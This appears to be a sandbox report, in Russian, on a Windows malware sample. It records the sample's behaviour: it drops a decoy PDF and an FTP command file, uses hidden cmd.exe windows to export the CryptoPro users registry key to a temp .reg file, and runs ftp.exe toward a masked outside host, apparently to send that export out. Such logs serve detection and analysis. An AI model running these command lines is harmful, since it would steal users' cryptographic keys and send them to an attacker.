Техническая информация
- %TEMP%\doc.pdf
- %TEMP%\ftpcommands.txt
- %TEMP%\ftpcommands.txt
- 'ft###load.net':21
- DNS ASK ft###load.net
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /C %WINDIR%\regedit.exe /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ftp.exe -s:"%TEMP%\FTPCommands.txt"' (со скрытым окном)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%TEMP%\doc.pdf"
- '%WINDIR%\syswow64\cmd.exe' /C %WINDIR%\regedit.exe /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"
- '%WINDIR%\syswow64\regedit.exe' /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"
- '%WINDIR%\syswow64\cmd.exe' /c ftp.exe -s:"%TEMP%\FTPCommands.txt"
- '%WINDIR%\syswow64\ftp.exe' -s:"%TEMP%\FTPCommands.txt"
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\ftp.exe"